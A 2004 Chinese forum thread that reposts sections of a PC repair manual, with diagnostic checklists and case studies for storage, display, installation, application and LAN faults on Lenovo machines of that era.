              硬盘保护卡不起保护功能，要检查用户是否关闭了硬盘保护功能，要启用硬盘保护功能，可在进入系统前按一下F4来启用（事先应已安装过），如果不行，可重新插拔一下硬盘保护卡。在Windows下，则应检查其驱动软件是否已安装；

              f)
              当启有了硬盘保护功能后，硬盘上原来的系统不被保留，应询部用户原系统是否是用第三方软件进行的分区。目前硬盘保护卡只能保护用xx作系统自带的FDISK进行分区的系统；

              g)
              在硬盘保护模式为每次还原，如果由于未正常关机，而出现多次提示进行磁盘扫描，应在管理员模式下，在Msdos.sys文件中加入autoscan=0的项；

              h) 对于在使用者模式下，出现乱码的现象，需在管理员模式下运行升级盘中的SETUP.EXE；
              3、 软盘驱动器
              1) 环境检查
              A. 软驱的在一定情况下，类似于硬盘的检查方法。
              B. 检查软驱的连接：
              a) 连接电缆安装是否正确，不应有插错或插反的现象；
              b) 软驱连接的位置，应与BIOS中设置的值相符；
              c) 软驱的电源连接是否正确。
              C. 软驱外观检查
              a) 软驱中是否有异物；
              b) 电路板上及其元器件是否有变形、变色、异味等现象。
              D. 所使用的软盘介质的质量是否太差；
              2) 故障判断要点
              A. 软驱的检查，应在软件最小系统中加入软驱，或去掉硬盘后进行检查判断。且在必要时，移出机箱外检查；
              B. 类似硬盘驱动器的检查。但要注意：BIOS中对软驱是否可读写的设置是否为允许或禁止；
              C.
              检查软驱的读、写能力，一方面是自身读写能力的检查，另一方面是软盘的互换读写能力的检查，即在可能有故障的软驱中写过的软盘能否在另一正常的软驱中读出。如果不能，更换软驱；

              D. 软盘是最易感染病毒的介质，因此的检查中，一定要注意对病毒的检查。
              4、 光盘驱动器
              1) 环境检查
              A. 检查光驱连接：
              a) 光驱上的ID跳线是否正确，它应与连接在线缆上的位置匹配；
              b) 连接光驱的数据线是否接错或接反；
              c) 光驱连接线是否有破损或硬折痕。可通过更换连接线检查；
              d) 光驱连接线类型是否与光驱的技术规格要求相符；
              e) 光驱电源是否已正确连接，不应有过松或插不到位的现象。
              B. 光驱外观检查：
              b) 光驱电路板上的元器件是否有变形、变色，及断裂缺损等现象；
              c) 光驱电源插座之接针是否有虚焊或脱焊现象；
              d) 加电后，光驱自检时指示灯是否不亮或常亮；工作时指示灯是否能正常闪亮；
              e) 加电后，要倾听光驱驱动器的运转声音是否正常，不应有异常的声响及过大的噪音。
              2) 故障判断要点
              A.
              光驱的检查，应用光驱替换软件最小系统中的硬盘进行检查判断。且在必要时，移出机箱外检查。检查时，用一可启动的光盘来启动，以初步检查光驱的故障。如不能正常读取，则在软件最小系统中检查。最先考察的是光驱；

              B. 类似硬盘驱动器的检查方法；
              C. 光驱性能检查：
              a)
              对于读盘能力差的故障，先考虑防病毒软件的影响，然后用随机光盘进行检测，如故障复现，更换维修，否则根据用户的需要及所见的故障进行相应的处理；

              b)
              必要时，通过刷新光驱的formware检查不驱的故障现象是否消失（如由于光驱中放入了一张CD光盘，导致系统第一次启动时，光驱工作不正常，就可偿试此方法）；

              D. xx作系统中配置检查：
              a) 在xx作系统下的应用软件能否支持当前所用光驱的技术规格；
              b) 设备管理器中的设置是否正确，IDE通道的设置是否正确。必要时卸载光驱驱动重启，以便让xx作系统重新识别。
              五、本类故障的判断流程
              见附录一之（三）。
              六、案例
              案例一:
              问题描述：小王是一家公司的计算机维护人员，办公用机为联想的奔月2000机型，13G硬盘，由于长时间电脑中系统和数据未进行维护，系统启动和运行都比较慢，将C盘上的重要数据复制到D盘，之后运行联想的系统恢复软件，将隐藏分区里的Windows98SE系统复制到C盘上。10分钟不到恢复完毕，再次重新启动，正常进入Windows98系统。但是进入系统后，发现原来用PM划分的扩展分区不见了大量的数据资料都在扩展分区中，如何是好？小王陷入尴尬的境地……

              解决方案：首先查看联想机器随机资料，说明书上写着“可能对PM等的分区格式不支持，分区时请用Fdisk……”，可能是进行系统恢复时破坏了原来的硬盘分区表，有没有什么办法解决呢Ｉ诵莫机进入MSDos或者进入PM，出了一个主分区和一个扩展分区没有其他的分区信息，这时想到软件Diskman，进入MSDos，运行Diskman，首先警告说分区表有误，Diskman虽然仍然把硬盘识别成两个分区，但它还有重新检测分区表的功能。重新检测分区表有全自动和交互两种方式，选择后者，Diskman就开始逐柱面检测硬盘上原已存在的分区表。过了很长的时间，原有的三个分区包括联想系统恢复软件隐藏的备份分区都被检测了出来，保持分区格式，一切正常。

              点评：用户应用中或是在用户对硬盘分区时断电都会导致硬盘分区表的错误，遇到此种问题时不要着急，要分析问题的原因，查看相关的资料，如相关软件和计算机附带的资料，借助相关的软件或工具解决，若是对硬盘的工作原理、相关软件或工具的应用不是很了解，一定要查找相关资料或是向人询问。

              注：Diskman硬盘分区表维护软件，运行于MSDOS环境，采用全中文图形界面，无须任何汉字系统支持。以图表的形式揭示了分区表的详细结构，支持鼠标xx作，支持8G以上的大硬盘和UNIX、NTFS等多种分区格式等。

              案例二：
              问题描述：一用户天禧二5311机型，用户反映用随机的软件NTI CD-Maker
              Plus中的FileCD工具格式化可擦写光盘的时候(明基CD-RW)，进度很快到100％，但是没有格式化完毕的提示，强行关闭对话框也无法关闭。最后等了只得结束任务。用NTI
              CD-Maker Plus刻录硬盘，刻录过程中显示刻录进度，并提示刻录完毕后，将刻录好的光盘放入光驱，提示无法识别光盘。
              解决方案：首先考虑是NTI CD-Maker中的插件FileCD的软件问题，升级NTI
              CD-Maker软件到V5.08，V5.13,都没能解决，升级到V5.15现象依旧，再看FileCD的版本和用户原机的FileCD的版本一样，为2.0.10后续的版本并未在擦写光盘的功能上有所改进。考虑选用另外的刻录软件，用NERO来进行测试（版本为V5.5.9.0），用该软件执行快速擦写后再对光盘进行刻录，依旧发生上述的现象。但是用SONY的CD-RW光盘则无此问题。

              点评：擦写光盘时和刻录软件及刻录机都有很大的关系，请工程师在解决问题时可以从多个角度考虑问题。
              案例三：
              问题描述：一用户光驱过保，用户自行购买光驱，据用户称在市场上购买光驱时进行测试，光驱没有任何问题，测试的数据盘和VCD等光盘都可以正常读出，但是回到家加装光驱后，开机进入系统，所有放入光驱中的碟片在驱动器的盘符上都只显示CD样的标记。用户回到购买处将光驱安装到测试机器上，问题复现。

              解决方案：经过检查发现，光驱的数据接口上一根数据线弯，导致驱动器中数据无法正常识别。
              [此贴子已经被作者于2004-1-28 17:12:08编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:53:39新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第8楼

               常见故障判断－－－ 显示类故障
              一、定义举例
              这类故障不仅包含由于显示设备或部件所引起的故障，还包含有由于其它部件不良所引起的在显示方面不正常的现象。也就是说，显示方面的故障不一定就是由于显示设备引起的，应全面进行观察和判断。

              二、可能的故障现象
              1、 开机无显、显示器有时或经常不能加电；
              2、 显示偏色、抖动或滚动、显示发虚、花屏等；
              3、 在某种应用或配置下花屏、发暗（甚至黑屏）、重影、死机等；
              4、 屏幕参数不能设置或修改；
              5、 亮度或对比度不可调或可调范围小、屏幕大小或位置不能调节或范围较小；
              6、 休眠唤醒后显示异常；
              7、 显示器异味或有声音。
              三、可能涉及的部件
              显示器、显示卡及其它们的设置；主板、内存、电源，及其它相关部件。特别要注意计算机周边其它设备及地磁对计算机的干扰。
              四、判断要点/顺序
              1、 维修前的准备
              相应显示卡的最新版驱动程序
              2、 环境检查
              1) 市电检查：
              A. 市电电压是否在220V±10%、50Hz或60Hz；市电是否稳定；
              B. 其余参考加电类故障中有关市电检查部分。
              2) 连接检查：
              A.
              显示器与主机的连接牢伤心、正确（特别注意，当有两个显示端口时，是否连接到正确的显示端口上）；电缆接头的针脚是否有变形、折断等现象，应注意检查显示电缆的质量是否完好；

              B. 显示器是否正确连接上市电，其电源指示是否正确（是否亮及颜色）；
              C. 显示设备的异常，是否与未接地线有关。特别注意：不允许电脑维修工程师为用户安装地线，应请用户通过正式电工来安装；
              3) 周边及主机环境检查：
              A. 检查环境温、湿度是否与使用手册相符（如钻石珑管，要求的使用温度为18~40C）；
              B. 显示器加电后是否有异味、冒烟或异常声响（如爆裂声等）；
              C. 显示卡上的元器件是否有变形、变色，或温升过快的现象；
              D. 显示卡是否插好，可以通过重插、用橡皮或酒精擦拭显示卡（包括其它板卡）的金手指部分来检查；主机内的灰尘是否较多，进行清除；
              E.
              周围环境中是否有干扰物存在（这些干扰物包括：日光灯、UPS、音箱、电吹风机、相伤心过近（50厘米以内）的其它显示器，及其它大功率电磁设备、线缆等）。注意显示器的摆放方向也可能由于地磁的的影响而对显示设备产生干扰；

              F. 对于偏色、抖动等故障现象，可通过改变显示器的方向和位置，检查故障现象能否消失。
              4) 其它检查及注意事项：
              A. 主机加电后，是否有正常的自检与运行的动作（如有自检完成的鸣叫声、硬盘指示灯不停闪烁等），如有，则重点检查显示器或显示卡；
              B. 禁止带电搬动显示器及显示器方向，在断电后的一段时间内（2~3分钟）也最好不要搬动显示器。
              3、 故障判断要点
              1) 调整显示器与显示卡：
              A. 通过调节显示器的OSD选项，最好是回复到RECALL（出厂状态）状态来检查故障是否消失。对于液晶显示器，需按一下auto
              config按钮；
              B. 显示器的参数是否调得过高或过低（如H/V-MOIRE，这是不能通过RECALL来恢复的）；
              C. 显示器各按钮可否调整，调整范围是否偏移显示器的规格要求；
              D.
              显示器的异常声响或异常气味，是否超出了显示器技术规格的要求（如新显示器刚用之时，会有异常的气味；刚加电时由于消磁的原因而引起的响声、屏幕抖动等，但这些都属正常现象）。有关显示器的规格，请见附录二之（二）；

              E. 显示卡的技术规格是否可用在主机中（如AGP 2.0卡是否可用在主机的AGP插槽中等）。
              2) BIOS配置调整：
              A.
              BIOS中的设置是否与当前使用的显示卡类型或显示器连接的位置匹配（即是用板载显示卡、还是外接显示卡；是AGP显示卡还是PCI显示卡）；

              B. 对于不支持自动分配显示内存的板载显示卡，需检查BIOS中显示内存的大小是否符合应用的需要；
              以下的检查应在软件最小系统下进行。
              3) 检查显示器/卡的驱动：
              A. 显示器/卡的驱动程序是否与显示设备匹配、版本是否恰当；
              B. 显示器的驱动是否正确，如果有厂家提供的驱动程序，最好使用厂家的驱动；
              C. 是否加载了合适的Direct X驱动（包括主板驱动）；
              D. 如果系统中装有Direct
              X驱动，可用其提供的Dxdiag.exe命令检查显示系统是否有故障。该程序还可用来对声卡设备进行检查。
              4) 显示属性、资源的检查：
              A. 在设备管理器中检查是否有其它设备与显示卡有资源冲突的情况，如有，先去除这些冲突的设备；
              B. 显示属性的设置是否恰当（如：不正确的监示器类型、刷新速率、分辨率和颜色深度等，会引起重影、模糊、花屏、抖动、甚至黑屏的现象）；

              5) xx作系统配置与应用检查：
              A. 系统中的一些配置文件（如：System.ini文件）中的设置是否恰当；
              B. 显示卡的技术规格或显示驱动的功能是否支持应用的需要；
              C. 是否存在其它软、硬件冲突。
              6) 硬件检查：
              A. 当显示调整正常后，应逐个添加其它部件，以检查是何部件引起显示不正常；
              B. 通过更换不同型号的显示卡或显示器，检查是否存在它们之间的匹配问题；
              C. 通过更换相应的硬件检查是否由于硬件故障引起显示不正常（建议的更换顺序为：显示卡、内存、主板）。
              五、本类故障的判断流程
              见附录一之（四）。
              六、案例
              案例一：
              问题描述：碰到过这样的一台机器，现象比较怪，机型为奔月2000
              PIII/800，故障为经常性的开机无显，有时能显示进入系统，但使用1-2小时会出现死机，重启又无显示，只有过很长时间再开机，才可以显示。

              解决方案：碰到此问题，首先断定应为硬件问题，打开机箱，查看各板卡并无松动（注：显卡与主板插槽上的联想贴条，粘得很紧），换件试吧，先后更换过内存、CPU、电源，均不能解决问题，再换主板吧，拆撕显卡与主板插槽的联想贴条时，感觉到显卡没插到位，向下按，还能再进去一点，遂怀疑是不是显卡与主板接触不良所致，于是又把机器的原部件全都还原，试机，一切正常。

              后记：此案例就是因为显卡的接触不良，而造成的奇怪故障，在维修中因为检测时的疏漏（只查看显卡是否插紧，而未实际动手检查一下），造成了维修过程的繁琐。

              案例二：
              问题描述：一台奔月机器，用户称每次启动都无法进入WIN98，光标停留在屏幕左上角闪动，死机；但安全模式可以进入。
              解决方案：怀疑为显卡或监视器设置不当所致，进入安全模式把显示分辨率设为640*480，颜色设为16色，重启，能以正常模式进入，但只要改动一下分辨率或颜色，则机器就不能正常启动；察看机器内部，除用户自加一块网卡外，别无其它配置，难道是网卡与显卡发生了冲突？拔掉网卡，能正常启动WIN98，给网卡换个插槽，开机检测到新硬件，加载完驱动，启动，一切正常。

              后记：由于显卡与其它部件不兼容或冲突造成的死机，完全可以先采用最小系统化的方法来测试（最小系统化法即只保留主板、CPU、显卡、电源等主要部件），先排除主要的部件，再逐一检测其它扩展卡。

              案例三：
              问题描述：三角洲部队-大地勇士，在810（e）系列主板的机器上运行（同禧、逐日系列），如用随机带的显卡驱动程序安装（而用随机盘进
              行驱动的安装又是我们一贯的作风），在进入游戏画面时，必然会导致死机。
              解决方案：解决方法就是从网上下载新版本的驱动，进行升级。
              后记：如果在实际维修中遇到玩3D游戏死机的故障，估计可能是显卡故障，而又无备件替换时（这在我们上门维修中，是经常遇到的），不妨从网上下载一个Direct
              control软件，通过它屏蔽掉AGP支持。再玩3D游戏，如不出现死机，说明问题很可能出在别处（如主板、内存）。如死机，则在很大程度上说明，这块显卡是有故障的了。

              案例四：
              故障描述: 开天2200 P4/1.7G （为QDI
              P7LI-AL主板），在运行华光超恩组版软件时（带一ISA加密卡），如进行放大显示，则左边界线无法显示。
              解决方案:
              用户新购机器，代理商在为用户安装超恩组版软件时，出现问题。换一新机，故障依旧，代理判断为华光ISA卡与此机型不兼容，让维修站上门解决。到用户处，复现故障，插一PCI显卡则显示正常，估计不为机器故障。在系统属性—性能—图形中，把硬件加速调低两格，问题解决。

              [此贴子已经被作者于2004-1-28 17:12:24编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:55:07新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第9楼

               常见故障判断－－－ 安装类故障
              一、定义举例
              这类故障主要是反映在安装xx作系统或应用软件时出现的故障
              二、可能的故障现象
              1、 安装xx作系统时，在进行文件复制过程中死机或报错；在进行系统配置时死机或报错；
              2、 安装应用软件时报错、重启、死机等（包括复制和配置过程）；
              3、 硬件设备安装后系统异常（如黑屏、不启动等）；
              4、 应用软件卸载后安装不上，或卸载不了等。
              三、可能涉及的部件
              磁盘驱动器、主板、CPU、内存，及其它可能的部件、软件。
              四、判断要点/顺序
              1、 维修前的准备
              1) 注意携带磁盘数据线；
              2) 相适应的最新版设备驱动程序。
              2、 环境检查
              1) 软件安装
              A. 检查硬件设备的连接与外观：
              a) 检查与主机连接的其他设备工作是否正常；
              b) 设备间的连接线是否接错或漏接。连接插头、座的接针是否有变形、缺失、短路等现象；
              c) 仔细检查报错信息，判断可能造成故障的部位；
              d) 观察系统是否有异味，元器件的温度；
              e) CPU风扇的转速是否过慢或不稳定；
              f) 驱动器工作时是否有不正常的声响。
              B. 其它方面检查：
              a) 认真对照软件的使用手册，确认机器的软、硬件配置符合该手册的要求；
              b) 仔细观察安装介质是否完好。
              2) 设备安装
              A. 检查设备的连接与外观：
              a) 要安装的设备、部件是否连接正确，连接电缆是否完好、接针是否有缺针、断针、或短接的现象；
              b) 要安装的设备、部件的制作工艺是否优良；
              c) 余类似上述软件安装。
              B. 驱动程序介质检查：用于安装设备的驱动程序介质是否完好。
              3、 故障判断要点
              1) xx作系统安装：
              A. 检查CMOS中的设置：
              a) 如果需要，请先恢复到出厂设置；
              b) 关闭BootEasy功能、关闭防病毒功能，及关闭BIOS防写开关；
              c) 特别注意硬盘的参数、CPU的温度等。注意观察自检时显示出来的信息是否与实际的硬件配置相符。
              B. 安装介质与目标介质检查：
              a) 检查是否有病毒；
              b) 检查分区表是否正确、分区是否激活。使用Fdisk
              /mbr命令来确保主引导记录是正确的（注意使用此命令后，如果机器不能启动，可证明原系统中存在病毒或有错误。硬盘应做初始化xx作）；
              c) 检查系统中是否有第三方内存驻留程序。
              以下过程，建议在软件最小系统下检查（注：在最小系统下，需要添加与安装有关的其它驱动器）。
              C. 安装过程检查：
              a)
              如果在复制文件时，报CAB等文件错，可偿试将原文件复制到另一介质（如硬盘）上再行安装。如果正常通过，则原安装介质有问题，可去检查介质及相应的驱动器是否有故障；若仍然不能复制，应检查相应的磁盘驱动器、数据线、内存等部件；

              b)
              如果是采用覆盖安装而出现上述问题，建议如果更换安装介质后仍不能排除故障，应先对硬盘进行初始化xx作，再重新安装（初始化xx作时，最好将硬盘分区彻底清除后进行）。如果仍不能解决，再考虑硬件；

              c)
              安装过程中，在检测硬件时出现错误提示、蓝屏或死机等，一是通过多重新启动几次（应该是关机重启），看能否通过；另一是在软件最小系统下检查是否能通过。如果不能通过，应该依次检查软件最小系统中的内存、磁盘、CPU（包括风扇）、电源等部件；如果能正常安装，则是软件最小系统之外的部件的故障或配置问题，这可通过在安装完成后，逐步添加那些部件，并判断是否有故障或配置不当；

              D. 硬件及其它应注意的问题：
              a)
              如果安装系统时重启或掉电，要求在软件最小系统下进行测试。如果故障消失，在安装好系统以后，将软件最小系统之外的设备逐一接上，检查故障是由哪个部件引起，并用替换法解决；如果故障不能消失，应检查软件最小系统中的电源、主板和内存，甚至磁盘驱动器；

              b) 在IDE设备上安装诸如UNIXxx作系统时，或要安装多个xx作系统时，要注意：一是8.4GB
              限制（UNIX的开始部分必须在8.4GB之内）——这一条在SCSI设备上无这一要求；另一是多xx作系统间的安装顺序及配合关系；
              E. 对于LEOS的安装应注意以下几点：
              a) 确保主板BIOS支持LEOS，建议在为用户更换主板后首先就要刷新支持LEOS的BIOS；
              b) 如果为用户更换硬盘，也要注意备件硬盘是否正确支持DMA66。否则在安装LEOS时也会出现问题；
              c)
              LEOS最好是在一块全新未被分区的硬盘上进行安装。具体顺序可以参考如下方案：新硬盘-〉安装LEOS->分区（Fdisk）->安装xx作系统（Windows
              XP）-〉制作一键恢复。如果原硬盘存在分区，可以使用Clear.com程序清楚后再安装LEOS。
              2) 应用软件安装：
              A. 检查安装应用软件问题时应注意的问题：
              a) 应用软件的安装问题，部分可参考上述的xx作系统安装的检查方法；
              b) 在进行安装前，要求先备份注册表，再进行安装；
              B. 软件间、软硬件间的冲突检查：
              a)


电脑维修知识总结2

《一键清理系统垃圾》

电脑维修知识总结2

              可采用两种软件问题隔离的方法。一是在软件最小系统下，关闭正在运行的应用程序，然后安装需要的应用软件；另一是在原系统下直接关闭正在运行的应用程序，然后安装需要的应用软件。关闭已有的应用的方法是：使用msconfig禁用启动组、autoexec.bat、config.sys、win.ini、system.ini中在启动时调用的程序；

              b) 使用任务管理器，检查系统中有无不正常的进程，并给予杀除；
              c) 对于基本满足软件技术手册要求但安装不上的情况，看能否通过设置调整来解决。如果不能解决，则视为不兼容；
              d) 利用其它机器（最好是不同配置的），检查是否存在软、硬件方面的兼容问题；
              e)
              检查系统中是否已经安装过该软件，如果已经安装过应先将其卸载后再安装，如果无法正常卸载，可以手动卸载或通过恢复注册表来卸载（对于Windows
              XP可使用系统还原功能来卸载）；
              f) 必要时，可从网络上查阅相关资料，之后再与软件厂商联系，看是否有其他的注意事项。
              C. 硬件检查：
              在以上的步骤都不奏效时可考虑硬件问题，应检查光驱、安装介质、硬盘线等配件。
              3) 硬件设备安装：
              A. 冲突检查：
              a)
              所安装的设备、部件是否在系统启动前的自检过程中识别到，或能由xx作系统识别到（非即插即用识备除外）。如果不能识别，应检查BIOS设置及设备本身，包括跳线及相应的插槽或端口；

              b)
              检查新安装的设备与原系统中的设备是否有冲突；通过改变驱动的安装顺序、去除原系统中的相应部件或设备、更换插槽，看故障是否消除。如果不能消除，则为不兼容；

              c) 加装的设备是否与现有系统的技术规格或物理规格匹配；
              d) 检查当前系统中的一些设置（主要是.ini文件中的设置）是否与所安装的部件或设备驱动有不匹配的地方；
              B. 驱动程序检查：所安装的设备驱动是否为合适的版本（即，不一定是最新的）；
              C. 硬件检查：
              a) 所安装的部件或设备是否本身就有故障；
              b) 检查原系统中的部件是否有不良的现象（如插槽损坏、供电能力不足等）。
              五、本类故障的判断流程
              见附录一之（五）。
              六、案例
              案例一：
              问题描述：用户报修天禧6620机器，在安装98过程中，提示剩余三分钟时。Hwinfo报错，无法正常安装。
              解决方案：工程师上门后，经过检测，确实存在用户反应的问题。然后尝试将安装文件拷贝到硬盘上安装和换一张安装盘安装，故障依旧。接着检查BIOS发现，系统日期是2075年。将日期改回后，故障排除。问题虽小，影响却大。在此，提醒各位同仁，做事要细心，不要忽略每个细节。

              案例二：
              问题描述：逐日2000机器，一次突然死机，不能启动，重装系统能成功，但在设备管理里有很多问号，如打印口，COM口等都没有驱动。
              解决方案：在站内又重装系统，驱动主板不能解决问题，看来只有更换主机才行了。打开机箱，发现有很多灰尘，取出主板，进行大扫除，抱着试一试的心里，重装一切OK。

              案例三：
              问题描述：一用户奔月4000机器/PIII 1G，他是单位技术员，说此机不能重装系统，每次重装都死机，要求上门维修。
              解决方案：到达用户处，发现重装到检测硬件时无反应，打开机器进行检查时，发现CPU风扇不是联想。客户说这是刚从市场上拿来的，新的，应没有问题。依次替代硬盘与内存没有用，经用户同意带回站内烤机，再换下主板与CPU还是不行，后经多次重试发现每次死时间越来越短，怀疑还是CPU风扇有问题。换其它联想机器上的风扇竟解决问题。引起故障原因是客户的CPU风扇转速不够，引起温度过高死机。
              [此贴子已经被作者于2004-1-28 17:12:37编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:56:41新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第10楼

               常见故障判断－－－误操作与应用类故障
              一、定义举例
              这类故障主要是指启动完毕后到关机前所发生的应用方面及系统方面的故障。
              二、可能的故障现象
              1、 休眠后无法正常唤醒；
              2、 系统运行中出现蓝屏、死机、非法xx作等故障现象；
              3、 系统运行速度慢；
              4、 运行某应用程序，导致硬件功能失效；
              5、 游戏无法正常运行；
              6、 应用程序不能正常使用。
              三、可能涉及的部件
              主板、CPU、内存、电源、磁盘、键盘、接插的板卡等
              四、判断要点/顺序
              1、 维修前的准备
              1) 干净的可用硬盘；
              2) 杀毒软件；
              3) 尽可能新的驱动程序、若干版本的BIOS；
              4) 磁盘连接的数据线等。
              2、 环境检查
              1) 市电及连接检查：
              A. 检查市电是否正常，连接是否牵伤心；是否有接地；
              B. 设备间的连接线是否接错或漏接。
              2) 周边及外观检查：
              A. 检查与主机连接的其他外设工作是否正常；
              B. 驱动器工作时是否有异响，CPU风扇的转速是否过慢或不稳定；
              C. 观察机箱内灰尘是否太多，而导致各插接件间接触不良。先除尘后可用橡皮等擦拭金手指，去除氧化层或灰尘。然后重新插上；
              D. 观察系统是否有异味，元器件的温升是否过高或过快。
              3) 显示与设置检查：
              A. 详细记录报错信息，判断可能造成故障的部位；
              B. 注意CMOS中对于硬盘、系统时间、CPU温度的设置，注意在自检时显示的硬件信息和机器配置是否相符；
              C. 仔细阅读软件的使用指南，注意软件运行的环境要求。
              4) 充分与用户沟通：
              A. 了解用户的使用情况；
              B. 出故障前的现象；
              C. 做过什么xx作才出现目前的故障。
              根据以上了解的情况，来初步判断可能的故障原因。
              3、 故障判断要点
              1） 检查是否由于用户误xx作引起
              A.
              机器出现死机、蓝屏或无故重启时，首先要考虑到用户的xx作是否符合xx作规范和要求，要仔细询问、观察用户的xx作方法是否符合常理，并由工程师用正确的方法xx作、应用用户的机器，查看是否出现用户所报修的故障。若不出现，则可认为是用户xx作不当引起的，由工程师向用户解释并演示正确的xx作方法。

              B. 若经过上述xx作故障依然存在，可用系统文件检查器检查用户的机器系统是否有丢失的DLL文件，并尝试恢复。
              C.
              注意观察用户的机器在死机、蓝屏或无故重启时有没有规律，并找出可能引起机器故障的原因（如机器在运行某一程序时或机器开机在一定时间内死机）。

              D. 通过与另一台软硬件相同且无故障的机器进行比较，查看故障机的文件大小是否相同或相差不大，主程序的版本是否一致。
              2） 检查是否由于病毒或防病毒程序引起故障
              A. 检查用户的机器是否被病毒感染，使用杀毒软件杀毒；
              B. 检查用户是否安装了两个或两个以上的防毒软件，建议用户使用其中一个，并卸载其他的防毒软件；
              C. 检查是否有木马程序，用最新版的杀毒程序可以查出木马程序。可以通过安装补丁来弥补程序中的安全漏洞，或者安装防火墙。
              3） 检查是否由于xx作系统问题引起故障
              A. 检查硬盘是否有足够的剩余空间，并检查临时文件是否太多。整理硬盘空间，删除不需要的文件；
              B. 对于系统文件损坏或丢失，可以使用系统文件检查器进行检查和修复；
              C. 检查xx作系统是否安装了合适的系统补丁（对于Winnt可在启动时观察service
              pack的版本，推荐使用SP6；Win2k和Winxp可以在系统属性中查看，Win2k推荐使用SP3，Winxp推荐使用SP1。）；

              D. 检查DirectX驱动是否正常，升级DirectX的版本；
              E. 检查是否正确安装了设备的驱动程序，并且驱动的版本是否合适。检查驱动安装的顺序是否正确（例如：首先安装主板驱动）。
              4） 检查是否由软件冲突、兼容引起故障
              A.
              检查用户应用软件的运行环境是否与现有的xx作系统（NT/98/2K/XP）相兼容，可通过查看软件说明书或到应用软件网页上查找相关资料，并查看网页上有没有对于此软件的升级程序或补丁可安装。

              B. 可用任务管理器观察故障机器的后台是否有不正常的程序在运行，并尝试关闭程序只保留最基本的后台程序。
              C. 注意查看故障机内是否有共用的DLL文件，可通过改变安装顺序或安装目录来解决问题。
              5） 检查硬件设置是否不正确
              A. 首先，检查CMOS设置是否正确，可恢复默认值；
              B. 在设备管理器中检查硬件是否正常，中断是否有冲突，如有冲突，调整系统资源（对于某些硬件，要阅读说明书，按照说明正确设置硬件）；
              C. 在设备管理器中将硬件驱动删除，重新安装驱动程序（最好安装版本正确的驱动程序），查看硬件驱动是否恢复正常；
              D. 运行硬件检测程序，如AMI等检测硬件是否有故障；
              E. 在软件最小系统情况下， 重新更新硬件驱动，观察故障是否消失。
              6） 检查是否为兼容问题
              A.
              遇到兼容性问题时，应检查硬件的规格和标准（如同时使用多条内存时检查内存是否为同一厂家、同一规格、同一容量、内存颗粒同一批次），是否允许在一起使用。

              B. 阅读说明书或到网页上查找相关资料，检查用户的硬件正常使用所需的软件要求，现在的软件环境是否符合要求，软硬件之间是否相互支持。
              C. 在设备管理器中检查用户的系统资源是否有冲突，如有冲突，手动调整系统源。
              D.
              在设备管理器中检查用户机器的硬件的驱动是否安装正确，更新合适版本的设备驱动（如某些显卡用WIN2000或WINXP自带的公版驱动，会造成某些大型3D游戏无法运行）；

              E. 检查维修BOM，去除非联想的硬件，检查系统是否可正常工作，如可正常工作，建议用户更换自行添加的硬件或查找硬件相关资料进行解决。

              7） 检查是否由于网络故障引起
              A.
              碰到机器连接在网络上，出现死机、运行慢、蓝屏等故障时，应首先关闭网络，与网络环境隔离，观察故障是否消失，如故障消失，则为网络问题引起故障。

              B. 确为网络问题引起的故障，其判断与解决步骤参考网络部分。
              8） 检查是否由于硬件性能不佳或损坏引起
              A. 使用相应的硬件检测程序，检查硬件是否有故障，如果有，利用替换法排除相应的硬件；
              B. 用替换法检查检测程序无法判断的硬件故障。
              附：在IE中删除临时文件可用以下几种办法：
              1、
              打开IE浏览器，在工具—internet选项中删除临时文件，清空历史记录。（对于IE无法打开的可在这项里的设置中选“每次启动Internet
              Explorer”，或将Internet临时文件夹使用的磁盘空间加大；
              2、 在开始—设置—任务栏和开始菜单—开始菜单程序中选清除；
              3、 在c:\windows\history目录中将历史记录删除；
              4、 在c:\windowsTemporary Internet Files中删除所有文件；
              5、 使用网络实铭等第三方软件进行清除。

              [此贴子已经被作者于2004-1-28 17:13:12编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:57:16新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第11楼

               常见故障判断－－－ 局域网类故障
              一、定义举例
              这类故障主要涉及局域网宽带网等网络环境中的故障。
              二、可能的故障现象
              1、 网卡不工作，指示灯状态不正确；
              2、 网络连不通或只有几台机器不能上网、能Ping通但不能连网、网络传输速度慢；
              3、 数据传输错误、网络应用出错或死机等；
              4、 网络工作正常，但某一应用下不能使用网络；
              5、 只能看见自己或个别计算机；
              6、 无盘站不能上网或启动报错；
              7、 网络设备安装异常。
              8、 网络时通时不通。
              三、可能涉及的部件
              网卡、交换机（包括HUB、路由器等）、网线、主板、硬盘、电源等相关部件。
              四、判断要点/顺序
              1. 维修前的准备
              1) 可用的网线（直连线和普通网线，线序符合国际标准）；
              2) 如有条件，带上网线连接检查器。
              2. 环境检查
              1) 电源连接检查：
              A. 市电的接线定义是否正确；
              B. 是否有地线；
              C. 网络上的各设备（如：HUB、交换机等）是否均已上电工作。
              2) 网线连接检查：
              A. 网线连接线序是否与网络连接的要求匹配（如直连和普通网线）；
              B. 网线的连通性是否正常，要查看网线有无破损、过度扭曲；
              C. 网线长度是否过长（如5类双绞线长度超过技术规格要求的100米）；
              D. 网线接头——水晶头是否完好、是否氧化；
              E. 网卡接口是否完好。重新插拨网线检查网线与网卡连接是否松动；
              F. 根据电缆要求是否有终结器，终结器是否正常。
              3) 网络设备外观及周边检查：
              A. 加电启动后，网卡指示灯是否亮等；
              B.
              HUB等设备的网线接口，在与终端或服务器连接后，如果终端或服务器启动及配置正常，其指示灯会亮（注意指示灯颜色是否正常，参考设备说明书），如果指示灯不亮，说明设备有故障；

              C. 网卡部件是否接插到位无翘起，网卡上金手指是否氧化；
              D. 网线或交换机等设备周围是否有干扰。
